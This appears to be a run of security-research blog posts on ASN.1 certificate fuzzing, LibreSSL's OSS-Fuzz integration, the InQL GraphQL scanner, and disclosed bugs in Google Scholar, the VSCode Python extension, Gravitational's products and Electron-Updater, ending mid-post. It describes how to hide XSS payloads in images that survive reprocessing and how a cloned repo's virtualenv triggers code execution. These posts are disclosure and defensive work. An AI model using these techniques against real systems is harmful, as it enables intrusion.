This is how a template for different message types could be defined:

-- Definition of the MESSAGE-CLASS information object class
MESSAGE-CLASS ::= CLASS {
    messageTypeId INTEGER UNIQUE
    &payload      [1] OPTIONAL,
    ...
}
WITH SYNTAX {
    MESSAGE-TYPE-ID  &messageTypeId
    [PAYLOAD    &payload]
}

-- Definition of some message types
TextMessageKinds MESSAGE-CLASS ::= {
    -- Text message
    {MESSAGE-TYPE-ID 0, PAYLOAD UTF8String}
    -- Read ACK (no payload)
  | {MESSAGE-TYPE-ID 1, PAYLOAD Sequence { ToMessageId INTEGER } }
}

MediaMessageKinds MESSAGE-CLASS ::= {
    -- JPEG
    {MESSAGE-TYPE-ID 2, PAYLOAD OctetString}
}

Parametrization allows the introduction of parameters in the specification of a type:

Message {MESSAGE-CLASS : MessageClass} ::= SEQUENCE {
    messageId     INTEGER,
    senderId      INTEGER,
    recipientId   INTEGER,
    sendTime      GeneralizedTime,
    messageTypeId MESSAGE-CLASS.&messageTypeId ({MessageClass}),
    payload       MESSAGE-CLASS.&payload ({MessageClass} {@messageTypeId})
}

While a complete overview of the format is not within the scope of this post, a very good entry-level, but quite comprehensive, resource I found is this ASN1 Survival guide. The nitty-gritty details can be found in the ITU standards X.680 to X.683.

Powerful as it may be, ASN.1 suffers from a large practical problem - it lacks a wide choice of compilers (parser generators), especially non-commercial ones. Most of them do not implement advanced features like information objects. This means that more often than not, data structures defined using ASN.1 are serialized and unserialized by handcrafted code instead of an autogenerated parser. This is also true for many libraries handling TLS certificates.

DER

DER (Distinguished Encoding Rules) is an encoding used to translate an ASN.1 object into bytes. It is a simple Tag-Length-Value format: each element is encoded by appending its type (tag), the length of the payload, and the payload itself. Its rules ensure there is only one valid representation for any given object, a useful property when dealing with digital certificates that must be signed and checked for anomalies.

The details of how DER works are not relevant to this post. A good place to start is here.

RFC 5280 and X.509

The format of the digital certificates used in TLS is defined in some RFCs, most importantly RFC 5280 (and then in RFC 5912, updated for ASN.1 2002). The specification is based on the ITU X.509 standard.

This is what the outermost layer of a TLS certificate contains:

Certificate  ::=  SEQUENCE  {
    tbsCertificate       TBSCertificate,
    signatureAlgorithm   AlgorithmIdentifier,
    signature            BIT STRING  
}

TBSCertificate  ::=  SEQUENCE  {
    version         [0]  Version DEFAULT v1,
    serialNumber         CertificateSerialNumber,
    signature            AlgorithmIdentifier,
    issuer               Name,
    validity             Validity,
    subject              Name,
    subjectPublicKeyInfo SubjectPublicKeyInfo,
    issuerUniqueID  [1]  IMPLICIT UniqueIdentifier OPTIONAL,
                         -- If present, version MUST be v2 or v3
    subjectUniqueID [2]  IMPLICIT UniqueIdentifier OPTIONAL,
                         -- If present, version MUST be v2 or v3
    extensions      [3]  Extensions OPTIONAL
                         -- If present, version MUST be v3 --
}

You may recognize some of these fields from inspecting a certificate using a browser integrated viewer.

Finding out what exactly should go inside a TLS certificate and how it should be interpreted was not an easy task - specifications were scattered inside a lot of RFCs and other standards, sometimes with partial or even conflicting information. Some documents from the recent past offer a good insight into the number of contradictory interpretations. Nowadays there seems to be more convergence, and a good place to start when looking for how a TLS certificate should be handled is the RFCs together with a couple of widely used TLS libraries.

Fuzzing TLS starting from ASN.1

Previous work

All the high profile TLS libraries include some fuzzing harnesses directly in their source tree and most are even continuously fuzzed (like LibreSSL which is now included in oss-fuzz thanks to my colleague Andrea). Most libraries use tried-and-tested fuzzers like AFL or libFuzzer, which are not encoding or syntax aware. This very likely means that many cycles are wasted generating and testing inputs which are rejected early by the parsers.

X.509 parsers have been fuzzed using many approaches. Frankencert, for instance, generates certificates by combining parts from existing ones, while CertificateFuzzer uses a hand-coded grammar. Some fuzzing efforts are more targeted towards discovering memory-corruption types of bugs, while others are more geared towards discovering logic bugs, often comparing the behavior of multiple parsers side by side to detect inconsistencies.

ASN1Fuzz

I wanted a tool capable of generating valid inputs from an ASN.1 grammar, so that I can slightly break them and hopefully find some vulnerabilities. I couldn’t find any tool accepting ASN.1 grammars, so I decided to build one myself.

After a lot of experimentation and three full rewrites, I have a pipeline that generates valid X509 certificates which looks like this

     +-------+
     | ASN.1 |
     +---+---+
         |
      pycrate
         |
 +-------v--------+        +--------------+
 | Python classes |        |  User Hooks  |
 +-------+--------+        +-------+------+
         |                         |
         +-----------+-------------+
                     |
                 Generator
                     |
                     |
                 +---v---+
                 |       |
                 |  AST  |
                 |       |
                 +---+---+
                     |
                  Encoder
                     |
               +-----v------+
               |            |
               |   Output   |
               |            |
               +------------+

First, I compile the ASN.1 grammar using pycrate, one of the few FOSS compilers that support most of the advanced features of ASN.1.

The output of the compiler is fed into the Generator. With a lot of introspection inside the pycrate classes, this component generates random ASTs conforming to the input grammar. The ASTs can be fed to an encoder (e.g. DER) to create a binary output suitable for being tested with the target application.

Certificates produced like this would not be valid, because many constraints are not encoded in the syntax. Moreover, I wanted to give the user total freedom to manipulate the generator behavior. To solve this problem I developed a handy hooking system which allows overrides at any point in the generator:

from pycrate_asn1dir.X509_2016 import AuthenticationFramework
from generator import Generator

spec = AuthenticationFramework.Certificate
cert_generator = Generator(spec)

@cert_generator.value_hook("Certificate/toBeSigned/validity/notBefore/.*")
def generate_notBefore(generator: Generator, node):
    now = int(time.time())
    start = now - 10 * 365 * 24 * 60 * 60  # 10 years ago
    return random.randint(start, now)

@cert_generator.node_hook("Certificate/toBeSigned/extensions/_item_[^/]*/" \
                          "extnValue/ExtnType/_cont_ExtnType/keyIdentifier")
def force_akid_generation(generator: Generator, node):
    # keyIdentifier should be present unless the certificate is self-signed
    return generator.generate_node(node, ignore_hooks=True)

@cert_generator.value_hook("Certificate/signature")
def generate_signature(generator: Generator, node):
    # (... compute signature ...)
    return (sig, siglen)

The AST generated by this pipeline can be already used for differential testing. For instance, if a library accepts the certificate while others don’t, there may be a problem that requires manual investigation.

In addition, the ASTs can be mutated using a custom mutator for AFL++ which performs random operations on the tree.

ASN1Fuzz is currently research-quality code, but I do aim at open sourcing it at some point in the future. Since the generation starts from ASN.1 grammars, the tool is not limited to generating TLS certificates, and it could be leveraged in fuzzing a plethora of other protocols.

Stay tuned for the next blog post where I will present the results from this research!

Researching Polymorphic Images for XSS on Google Scholar

2020-04-30T00:00:00+02:00

A few months ago I came across a curious design pattern on Google Scholar. Multiple screens of the web application were fetched and rendered using a combination of location.hash parameters and XHR to retrieve the supposed templating snippets from a relative URI, rendering them on the page unescaped.

This is not dangerous per se, unless the platform lets users upload arbitrary content and serve it from the same origin, which unfortunately Google Scholar does, given its image upload functionality.

While any penetration tester worth her salt would deem the exploitation of the issue trivial, Scholar’s image processing backend was applying different transformations to the uploaded images (i.e. stripping metadata and reprocessing the picture). When reporting the vulnerability, Google’s VRP team did not consider the upload of a polymorphic image carrying a valid XSS payload possible, and instead requested a PoC||GTFO.

Given the age of this technique, I first went through all past “well-known” techniques to generate polymorphic pictures, and then developed a test suite to investigate the behavior of some of the most popular libraries for image processing (i.e. Imagemagick, GraphicsMagick, Libvips). This effort led to the discovery of some interesting caveats. Some of these methods can also be used to conceal web shells or Javascript content to bypass “self” CSP directives.

Payload in EXIF

The easiest approach is to embed our payload in the metadata of the image. In the case of JPEG/JFIF, these pieces of metadata are stored in application-specific markers (called APPX), but they are not taken into account by the majority of image libraries. Exiftool is a popular tool to edit those entries, but you may find that in some cases the characters will get entity-escaped, so I resorted to inserting them manually. In the hope of Google’s Scholar preserving some whitelisted EXIFs, I created an image having 1.2k common EXIF tags, including CIPA standard and non-standard tags.

While that didn’t work in my case, some of the EXIF entries are to this day kept in many popular web platforms. In most of the image libraries tested, PNG metadata is always kept when converting from PNG to PNG, while they are always lost from PNG to JPG.

Payload concatenated at the end of the image (after 0xFFD9 for JPGs or IEND for PNGs)

This technique will only work if no transformations are performed on the uploaded image, since only the image content is processed.

As the name suggests, the trick involves appending the JavaScript payload at the end of the image format.

Payload in PNG’s iDAT

In PNGs, the iDAT chunk stores the pixel information. Depending on the transformations applied, you may be able to directly insert your raw payload in the iDAT chunks or you may try to bypass the resize and re-sampling operations. Google’s Scholar only generated JPG pictures so I could not leverage this technique.

Payload in JPG’s ECS

In the JFIF standard, the entropy-coded data segment (ECS) contains the output of the raw Huffman-compressed bitstream which represents the Minimum Coded Unit (MCU) that comprises the image data. In theory, it is possible to position our payload in this segment, but there are no guarantees that our payload will survive the transformation applied by the image library on the server. Creating a JPG image resistant to the transformations caused by the library was a process of trial and error.

As a starting point I crafted a “base” image with the same quality factors as the images resulting from the conversion. For this I ended up using this image having 0-length-string EXIFs. Even though having the payload positioned at a variable offset from the beginning of the section did not work, I found that when processed by Google Scholar the first bytes of the image’s ECS section were kept if separated by a pattern of 0x00 and 0x14 bytes.

From here it took me a little time to find the right sequence of bytes allowing the payload to survive the transformation, since the majority of user agents were not tolerating low-value bytes in the script tag definition of the page. For anyone interested, we have made available the images embedding the onclick and mouseover events. Our image library test suite is available on Github as doyensec/StandardizedImageProcessingTest.

Timeline

[2019-09-28] Reported to Google VRP
[2019-09-30] Google’s VRP requested a PoC
[2019-10-04] Provided PoC #1
[2019-10-10] Google’s VRP requested a different payload for PoC
[2019-10-11] Provided PoC #2
[2019-11-05] Google’s VRP confirmed the issue in 2 endpoints, rewarded $6267.40
[2019-11-19] Google’s VRP found another XSS using the same technique, rewarded an additional $3133.70

LibreSSL and OSS-Fuzz

2020-04-08T00:00:00+02:00

The story of a fuzzing integration reward

In my first month at Doyensec I had the opportunity to bring together both my work and my spare time hobbies. I used the 25% research time offered by Doyensec to integrate the LibreSSL library into OSS-Fuzz. LibreSSL is an API compatible replacement for OpenSSL, and after the heartbleed attack, it is considered as a full-fledged replacement of OpenSSL on OpenBSD, macOS and VoidLinux.

Contextually to this research, we were awarded by Google a $10,000 bounty, 100% of which was donated to the Cancer Research Institute. The fuzzer also discovered 14+ new vulnerabilities and four of these were directly related to memory corruption.

In the following paragraphs we will walk through the process of porting a new project over to OSS-Fuzz from following the community provided steps all the way to the actual code porting and we will also show a vulnerability fixed in 136e6c997f476cc65e614e514ac3bf6ee54fc4b4.

commit 136e6c997f476cc65e614e514ac3bf6ee54fc4b4
Author: beck <>
Date:   Sat Mar 23 18:48:15 2019 +0000

    Add range checks to varios ASN1_INTEGER functions to ensure the
    sizes used remain a positive integer. Should address issue
    13799 from oss-fuzz
    ok tb@ jsing@

 src/lib/libcrypto/asn1/a_int.c    | 56 +++++++++++++++++++++++++++++++++++++++++++++++++++++---
 src/lib/libcrypto/asn1/tasn_prn.c |  8 ++++++--
 src/lib/libcrypto/bn/bn_lib.c     |  4 +++-
 3 files changed, 62 insertions(+), 6 deletions(-)

The FOSS historician blurry book

As a voidlinux maintainer, I’m a long time LibreSSL user and proponent. LibreSSL is a version of the TLS/crypto stack forked from OpenSSL in 2014 with the goals of modernizing the codebase, improving security, and applying best practice development procedures. The motivation for this kind of fork arose after the discovery of the Heartbleed vulnerability.

LibreSSL’s efforts are aimed at removing code considered useless for the target platforms, removing code smells and including additional secure defaults at the cost of compatibility. The LibreSSL codebase is now nearly 70% the size of OpenSSL (237558 cloc vs 335485 cloc), while implementing a similar API on all the major modern operating systems.

Forking is considered a Bad Thing not merely because it implies a lot of wasted effort in the future, but because forks tend to be accompanied by a great deal of strife and acrimony between the successor groups over issues of legitimacy, succession, and design direction. There is serious social pressure against forking. As a result, major forks (such as the Gnu-Emacs/XEmacs split, the fissioning of the 386BSD group into three daughter projects, and the short-lived GCC/EGCS split) are rare enough that they are remembered individually in hacker folklore.

Eric Raymond Homesteading the Noosphere

The LibreSSL effort was generally well received and it now replaces OpenSSL on OpenBSD, macOS since 10.11 and on many other Linux distributions. In the first few years 6 critical vulnerabilities were found in OpenSSL and none of them affected LibreSSL.

Historically, these kinds of forks tend to spawn competing projects which cannot later exchange code, splitting the potential pool of developers between them. However, the LibreSSL team has largely demonstrated of being able to merge and implement new OpenSSL code and bug fixes, all the while slimming down the original source code and cutting down on rarely used or dangerous features.

OSS-Fuzz Selection

While the development of LibreSSL appears to be a story with an happy ending, the integration of fuzzing and security auditing into the project was much less so. The Heartbleed vulnerability was like a wakeup call to the industry for tackling the security of libraries that make up the core of the internet. In particular, Google opened up OSS-Fuzz project. OSS-Fuzz is an effort to provide, for free, Google infrastructure to perform fuzzing against the most popular open source libraries. One of the first projects performing these tests was in fact Openssl.

Fuzz testing is a well-known technique for uncovering programming errors in software. Many of these detectable errors, like buffer overflows, can have serious security implications. OpenSSL included fuzzers in c38bb72797916f2a0ab9906aad29162ca8d53546 and was integrated into OSS-Fuzz later in 2016.

commit c38bb72797916f2a0ab9906aad29162ca8d53546
Refs: OpenSSL_1_1_0-pre5-217-gc38bb72797
Author:     Ben Laurie <ben@links.org>
AuthorDate: Sat Mar 26 17:19:14 2016 +0000
Commit:     Ben Laurie <ben@links.org>
CommitDate: Sat May 7 18:13:54 2016 +0100
    Add fuzzing!

Since both LibreSSL and OpenSSL share most of their codebase, with LibreSSL mainly implementing a secure subset of OpenSSL, we thought porting the OpenSSL fuzzers to LibreSSL would have been a fun and useful project. Moreover, this resulted in the discovery of several memory related corruption bugs.

To be noted, the following details won’t replace the official OSS-Fuzz guide but will instead help in selecting a good target project for OSS-Fuzz integration. Generally speaking applying for a new OSS-Fuzz integration proceeds in four logical steps:

Selection: Select a new project that isn’t yet ported. Check for existing projects in OSS-Fuzz projects directory. For example, check if somebody already tried to perform the same integration in a pull-request.
Feasibility: Check the feasibility and the security implications of that project on the Internet. As a general guideline, the more impact the project has on the everyday usage of the web the bigger the bounty will be. At the time of writing, OSS-Fuzz bounties are up to $20,000 with the Google patch-reward program. On the other hand, good coverage is expected to be developed for any integration. For this reason it is easier to integrate projects that already employ fuzzers.
Technical integration: Follow the super detailed getting started guide to perform an initial integration.
Profit: Apply for the Google patch-reward program. Profit?!

We were awarded a bounty, and we helped to protect the Internet just a little bit more. You should do it too!

Heartbreak

After a crash was found, OSS-Fuzz infrastructure provides a minimized test case which can be inspected by an analyst. The issue was found in the ASN1 parser. ASN1 is a formal notation used for describing data transmitted by telecommunications protocols, regardless of language implementation and physical representation of these data, whether complex or very simple. Coincidentally, it is employed for x.509 certificates, which represents the technical base for building public-key infrastructure.

Passing our testcase 0202 ff25 through dumpasn1 it’s possible to see how it errors out saying that the integer of length 2 (bytes) is encoded with a negative value. This is not allowed in ASN1, and it should not even be allowed in LibreSSL. However, as discovered by OSS-Fuzz, this test crashes the Libressl parser.

$ xxd ./test
xxd ../test
00000000: 0202 ff25                                ...%
$ dumpasn1 ./test
  0   2: INTEGER 65317
       :   Error: Integer is encoded as a negative value.

0 warnings, 1 error.

Since the LibreSSL implementation was not guarded against negative integers, trying to covert the ASN1 integer crafted a negative to an internal representation of BIGNUM and causes an uncontrolled over-read.

AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==1==ERROR: AddressSanitizer: SEGV on unknown address 0x00009fff8000 (pc 0x00000058a308 bp 0x7ffd3e8b7bb0 sp 0x7ffd3e8b7b40 T0)
    ==1==The signal is caused by a READ memory access.
    SCARINESS: 20 (wild-addr-read)
        #0 0x58a307 in BN_bin2bn libressl/crypto/bn/bn_lib.c:601:19
        #1 0x6cd5ac in ASN1_INTEGER_to_BN libressl/crypto/asn1/a_int.c:456:13
        #2 0x6a39dd in i2s_ASN1_INTEGER libressl/crypto/x509v3/v3_utl.c:175:16
        #3 0x571827 in asn1_print_integer_ctx libressl/crypto/asn1/tasn_prn.c:457:6
        #4 0x571827 in asn1_primitive_print libressl/crypto/asn1/tasn_prn.c:556
        #5 0x571827 in asn1_item_print_ctx libressl/crypto/asn1/tasn_prn.c:239
        #6 0x57069a in ASN1_item_print libressl/crypto/asn1/tasn_prn.c:195:9
        #7 0x4f4db0 in FuzzerTestOneInput libressl.fuzzers/asn1.c:282:13
        #8 0x7fd3f5 in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) /src/libfuzzer/FuzzerLoop.cpp:529:15
        #9 0x7bd746 in fuzzer::RunOneTest(fuzzer::Fuzzer*, char const*, unsigned long) /src/libfuzzer/FuzzerDriver.cpp:286:6
        #10 0x7c9273 in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) /src/libfuzzer/FuzzerDriver.cpp:715:9
        #11 0x7bcdbc in main /src/libfuzzer/FuzzerMain.cpp:19:10
        #12 0x7fa873b8282f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/libc-start.c:291
        #13 0x41db18 in _start

This “wild” address read may be employed by malicious actors to perform leaks in security sensitive context. The Libressl maintainers team not only addressed the vulnerability promptly but also included an ulterior protection in order to guard against missing ASN1_PRIMITIVE_FUNCS in 46e7ab1b335b012d6a1ce84e4d3a9eaa3a3355d9.

commit 46e7ab1b335b012d6a1ce84e4d3a9eaa3a3355d9
Author: jsing <>
Date:   Mon Apr 1 15:48:04 2019 +0000

    Require all ASN1_PRIMITIVE_FUNCS functions to be provided.

    If an ASN.1 item provides its own ASN1_PRIMITIVE_FUNCS functions, require
    all functions to be provided (currently excluding prim_clear). This avoids
    situations such as having a custom allocator that returns a specific struct
    but then is then printed using the default primative print functions, which
    interpret the memory as a different struct.

Closing the door to strangers

Fuzzing, despite being seen as one of the easiest ways to discover security vulnerabilities, still works very well. Even if OSS-Fuzz is especially tailored to open source projects, it can also be adapted to closed source projects. In fact, at the cost of implementing the LLVMFuzzerOneInput interface, it integrates all the latest and greatest clang/llvm fuzzer technology. As Dockerfile language improves enormously on the devops side, we strongly believe that the OSS-Fuzz fuzzing interface definition language should be employed in every non-trivial closed source project too. If you need help, contact us for your security automation projects!

As always, this research was funded thanks to the 25% research time offered at Doyensec. Tune in again for new episodes!

InQL Scanner

2020-03-26T00:00:00+01:00

InQL is now public!

As a part of our continuing security research journey, we started developing an internal tool to speed-up GraphQL security testing efforts. We’re excited to announce that InQL is available on Github.

InQL can be used as a stand-alone script, or as a Burp Suite extension (available for both Professional and Community editions). The tool leverages GraphQL built-in introspection query to dump queries, mutations, subscriptions, fields, arguments and retrieve default and custom objects. This information is collected and then processed to construct API endpoints documentation in the form of HTML and JSON schema. InQL is also able to generate query templates for all the known types. The scanner has the ability to identify basic query types and replace them with placeholders that will render the query ready to be ingested by a remote API endpoint.

We believe this feature, combined with the ability to send query templates to Burp’s Repeater, will decrease the time to exploit vulnerabilities in GraphQL endpoints and drastically lower the bar for security research against GraphQL tech stacks.

InQL Scanner Burp Suite Extension

Using the inql extension for Burp Suite, you can:

Search for known GraphQL URL paths; the tool will grep and match known values to detect GraphQL endpoints within the target website
Search for exposed GraphQL development consoles (GraphiQL, GraphQL Playground, and other common utilities)
Use a custom GraphQL tab displayed on each HTTP request/response containing GraphQL
Leverage the template generation by sending those requests to Burp’s Repeater tool
Configure the tool by using a custom settings tab

Your browser does not support the video tag.

Enabling InQL Scanner Extension in Burp

To use inql in Burp Suite, import the Python extension:

Download the latest Jython Jar
Download the latest version of InQL scanner
Start Burp Suite
Extender Tab > Options > Python Enviroment > Set the location of Jython standalone JAR
Extender Tab > Extension > Add > Extension Type > Select Python
Extension File > Set the location of inql_burp.py > Next
The output window should display the following message: InQL Scanner Started!

In the next future, we might consider integrating the extension within Burp’s BApp Store.

InQL Demo

We completely revamped the command line interface in light of InQL’s public release. This interface retains most of the Burp plugin functionalities.

It is now possible to install the tool with pip and run it through your favorite CLI.

pip install inql

For all supported options, check the command line help:

usage: inql [-h] [-t TARGET] [-f SCHEMA_JSON_FILE] [-k KEY] [-p PROXY]
            [--header HEADERS HEADERS] [-d] [--generate-html]
            [--generate-schema] [--generate-queries] [--insecure]
            [-o OUTPUT_DIRECTORY]

InQL Scanner

optional arguments:
  -h, --help            show this help message and exit
  -t TARGET             Remote GraphQL Endpoint (https://<Target_IP>/graphql)
  -f SCHEMA_JSON_FILE   Schema file in JSON format
  -k KEY                API Authentication Key
  -p PROXY              IP of web proxy to go through (http://127.0.0.1:8080)
  --header HEADERS HEADERS
  -d                    Replace known GraphQL arguments types with placeholder
                        values (useful for Burp Suite)
  --generate-html       Generate HTML Documentation
  --generate-schema     Generate JSON Schema Documentation
  --generate-queries    Generate Queries
  --insecure            Accept any SSL/TLS certificate
  -o OUTPUT_DIRECTORY   Output Directory

An example query can be performed on one of the numerous exposed APIs, e.g anilist.co endpoints:

$ $ inql -t https://anilist.co/graphql
[+] Writing Queries Templates
 |  Page
 |  Media
 |  MediaTrend
 |  AiringSchedule
 |  Character
 |  Staff
 |  MediaList
 |  MediaListCollection
 |  GenreCollection
 |  MediaTagCollection
 |  User
 |  Viewer
 |  Notification
 |  Studio
 |  Review
 |  Activity
 |  ActivityReply
 |  Following
 |  Follower
 |  Thread
 |  ThreadComment
 |  Recommendation
 |  Like
 |  Markdown
 |  AniChartUser
 |  SiteStatistics
[+] Writing Queries Templates
 |  UpdateUser
 |  SaveMediaListEntry
 |  UpdateMediaListEntries
 |  DeleteMediaListEntry
 |  DeleteCustomList
 |  SaveTextActivity
 |  SaveMessageActivity
 |  SaveListActivity
 |  DeleteActivity
 |  ToggleActivitySubscription
 |  SaveActivityReply
 |  DeleteActivityReply
 |  ToggleLike
 |  ToggleLikeV2
 |  ToggleFollow
 |  ToggleFavourite
 |  UpdateFavouriteOrder
 |  SaveReview
 |  DeleteReview
 |  RateReview
 |  SaveRecommendation
 |  SaveThread
 |  DeleteThread
 |  ToggleThreadSubscription
 |  SaveThreadComment
 |  DeleteThreadComment
 |  UpdateAniChartSettings
 |  UpdateAniChartHighlights
[+] Writing Queries Templates
[+] Writing Queries Templates

The resulting HTML documentation page will contain details for all available queries, mutations, and subscriptions.

Stay tuned!

Back in May 2018, we published a blog post on GraphQL security where we focused on vulnerabilities and misconfigurations. As part of that research effort, we developed a simple script to query GraphQL endpoints. After the publication, we received a lot of positive feedbacks that sparked even more interest in further developing the concept. Since then, we have refined our GraphQL testing methodologies and tooling. As part of our standard customer engagements, we often perform testing against GraphQL technologies, hence we expect to continue our research efforts in this space. Going forward, we will keep improving detection and make the tool more stable.

This project was made with love in the Doyensec Research island.

Don't Clone That Repo: Visual Studio Code^2 Execution

2020-03-16T00:00:00+01:00

This is the story of how I stumbled upon a code execution vulnerability in the Visual Studio Code Python extension. It currently has 16.5M+ installs reported in the extension marketplace.

Your browser does not support the video tag.

The bug

Some time ago I was reviewing a client’s Python web application when I noticed a warning

Fair enough, I thought, I just need to install pylint.

To my surprise, after running pip install --user pylint the warning was still there. Then I noticed venv-test displayed on the lower-left of the editor window. Did VSCode just automatically select the Python environment from the project folder?! To confirm my hypothesis, I installed pylint inside that virtualenv and the warning disappeared.

This seemed sketchy, so I added os.exec("/Applications/Calculator.app") to one of pylint sources and a calculator spawned. Easiest code execution ever!

VSCode behaviour is dangerous since the virtualenv found in a project folder is activated without user interaction. Adding a malicious folder to the workspace and opening a python file inside the project is sufficient to trigger the vulnerability. Once a virtualenv is found, VSCode saves its path in .vscode/settings.json. If found in the cloned repo, this value is loaded and trusted without asking the user. In practice, it is possible to hide the virtualenv in any repository.

The behavior is not in VSCode core, but rather in the Python extension. We contacted Microsoft on the 2nd October 2019, however the vulnerability is still not patched at the time of writing. Given that the industry-standard 90 days expired and the issue is exposed in a GitHub issue, we have decided to disclose the vulnerability.

PoC || GTFO

You can try for yourself! This innocuous PoC repo opens Calculator.app on macOS:

1) git clone git@github.com:doyensec/VSCode_PoC_Oct2019.git
2) add the cloned repo to the VSCode workspace
3) open test.py in VScode

This repo contains a “malicious” settings.json which selects the virtualenv in totally_innocuous_folder/no_seriously_nothing_to_see_here.

In case of a bare-bone repo like this noticing the virtualenv might be easy, but it’s clear to see how one might miss it in a real-life codebase. Moreover, it is certainly undesirable that VSCode executes code from a folder by just opening a Python file in the editor.

Disclosure Timeline

2nd Oct 2019: Issue discovered
2nd Oct 2019: Security advisory sent to Microsoft
8th Oct 2019: Response from Microsoft, issue opened on vscode-python bug tracker #7805
7th Jan 2020: Asked Microsoft for a resolution timeframe
8th Jan 2020: Microsoft replies that the issue should be fixed by mid-April 2020
16th Mar 2020: Doyensec advisory and blog post is published

Edits

17th Mar 2020: The blogpost stated that the extension is bundled by default with the editor. That is not the case, and we removed that claim. Thanks @justinsteven for pointing this out!

2019 Gravitational Security Audit Results

2020-03-02T00:00:00+01:00

This is a re-post of the original blogpost published by Gravitational on the 2019 security audit results for their two products: Teleport and Gravity.

You can download the security testing deliverables for Teleport and Gravity from our research page.

We would like to take this opportunity to thank the Gravitational engineering team for choosing Doyensec and working with us to ensure a successful project execution.

We now live in an era where the security of all layers of the software stack are immensely important, and simply open sourcing a code base is not enough to ensure that security vulnerabilities surface and are addressed. At Gravitational, we see it as a necessity to engage a third party that specializes in acting as an adversary, and provide an independent analysis of our sources.

This year, we had an opportunity to work with Doyensec, which provided the most thorough independent analysis of Gravity and Teleport to date. The Doyensec team did an amazing job at finding areas where we are weak in the Gravity code base. Here is the full report for Teleport and Gravity; and you can find all of our security audits here.

Gravity

Gravity has a lot of moving components. As a Kubernetes distribution and distributed system for delivering Kubernetes in many unique environments, the product’s attack surface isn’t small.

All flaws considered medium or higher except for one were patched and released as they were reported by the Doyensec team, and we’ve also been working towards addressing the more minor and informational issues as part of our normal release process. Out of the four vulnerabilities rated as high by Doyensec, we’ve managed to patch three of them, and the fourth relies on a significant investment in design and tooling change which we’ll go into in a moment.

Insecure Decompression of Application Bundles

Part of what Gravity does is package applications into an installer that can be taken to on-prem and air-gapped environments, installing a fully working Kubernetes cluster and application without dependencies. As such, we build our artifacts as a tar file - a virtually universally supported archive format.

Along with this, our own tooling is able to process and accept these tar archives, which is where we run into problems. Golang’s tar handling code is extremely basic and this allows very old tar handling problems to surface, granting specially crafted tar files the ability to overwrite arbitrary system files and allowing for remote code execution. Our tar handling has now been hardened against such vulnerabilities, and we’ll write a post digging into just this topic soon.

Remote Code Execution via Malicious Auth Connector

When using our cli tools to do single sign on, we launch a browser for the user to the single sign on page. This was done by passing a url from the server to the client to tell it where the SSO page is located.

Someone with access to the server is able to change the url to be a non http(s) url and execute programs locally on the cli host. We’ve implemented sanitization of the url passed by the server to enforce http(s), and also changed the design of some new features to not require trusting data from a server.

Missing ACLs in the API

Perhaps the most embarrassing issue in this list - the API endpoints responsible for managing API tokens were missing authorization ACLs. This allowed for any authenticated user, even those with empty permissions, to access, edit, and create tokens for other users. This would allow for user impersonation and privilege escalation. This vulnerability was quickly addressed by implementing the correct ACLs, and the team is working hard to ensure these types of vulnerabilities do not reoccur.

Missing Signature Verification in Application Bundles

This is the vulnerability we haven’t been able to address so far, as it was never a design objective to protect against this particular vulnerability.

Gravity includes a hub product for enterprise customers that allows for the storage and download of application assets, either for installation or upgrade. In essence, part of the hub product is to act as a file server where a company can store their application, and internally or publically connect deployed clusters for updates.

The weakness in the model, as has been seen by many public artifact repositories, is that this security model relies on the integrity of the system storing those assets.

While not necessarily a vulnerability on its own, this is a design weakness that doesn’t match the capabilities the security community expects. The security is roughly equivalent to posting a binary build to Github - anyone with the correct access can modify or post malicious assets, and anyone who trusts Github when downloading that asset could be getting a malicious asset. Instead, packages should be signed in some way before being posted to a public download server, and the software should have a method for trusting that updates and installs come from a trusted source.

This is a really difficult problem that many companies have gotten wrong, so it’s not something that Gravitational as an organization is willing to rush a solution for. There are several well known models that we are evaluating, but we’re not at a stage where we have a solution that we’re completely happy with.

In this realm, we’re also going to end-of-life the hub product as the asset storage functionality is not widely used. We’re also going move the remote access functionality that our customers do care about over to our Teleport product.

Teleport

As we mentioned in the Teleport 4.2 release notes, the most serious issues were centered around the incorrect handling of session data. If an attacker was able to gain valid x509 credentials of a Teleport node, they could use the session recording facility to read/write arbitrary files on the Auth Server or potentially corrupt recorded session data.

These vulnerabilities could be only exploited using credentials from a previously authenticated client. There was no known way to exploit this vulnerability outside the cluster by non-authenticated clients.

After the re-assessment, all issues with any direct security impact were addressed. From the report:

In January 2020, Doyensec performed a retesting of the Teleport platform and confirmed the effectiveness of the applied mitigations. All issues with direct security impact have been addressed by Gravitational.

Even though all direct issues were mitigated, there was one issue in the report that continued to bother us and we felt we could do better on: “#6: Session Recording Bypasses”. This is something we had known about for quite some time and something we have been upfront with to users and customers. Session recording is a great feature, however due to the inherent complexity of the problem being solved, bypasses do exist.

Teleport 4.2 introduced a new feature called Enhanced Session Recording that uses eBPF tooling to substantially reduce the bypass gaps that can exist. We’ll have more to share on that soon in the form of another blog post that will go into the technical implementation details for that feature.

Signature Validation Bypass Leading to RCE In Electron-Updater

2020-02-24T00:00:00+01:00

We’ve been made aware that the vulnerability discussed in this blog post has been independently discovered and disclosed to the public by a well-known security researcher. Since the security issue is now public and it is over 90 days from our initial disclosure to the maintainer, we have decided to publish the details - even though the fix available in the latest version of Electron-Builder does not fully mitigate the security flaw.

Electron-Builder advertises itself as a “complete solution to package and build a ready for distribution Electron app with auto update support out of the box”. For macOS and Windows, code signing and verification are also supported. At the time of writing, the package counts around 100k weekly downloads, and it is being used by ~36k projects with over 8k stargazers.

This software is commonly used to build platform-specific packages for ElectronJs-based applications and it is frequently employed for software updates as well. The auto-update feature is provided by its electron-updater submodule, internally using Squirrel.Mac for macOS, NSIS for Windows and AppImage for Linux. In particular, it features a dual code-signing method for Windows (supporting SHA1 & SHA256 hashing algorithms).

A Fail Open Design

As part of a security engagement for one of our customers, we have reviewed the update mechanism performed by Electron Builder, and discovered an overall lack of secure coding practices. In particular, we identified a vulnerability that can be leveraged to bypass the signature verification check hence leading to remote command execution.

The signature verification check performed by electron-builder is simply based on a string comparison between the installed binary’s publisherName and the certificate’s Common Name attribute of the update binary. During a software update, the application will request a file named latest.yml from the update server, which contains the definition of the new release - including the binary filename and hashes.

To retrieve the update binary’s publisher, the module executes the following code leveraging the native Get-AuthenticodeSignature cmdlet from Microsoft.PowerShell.Security:

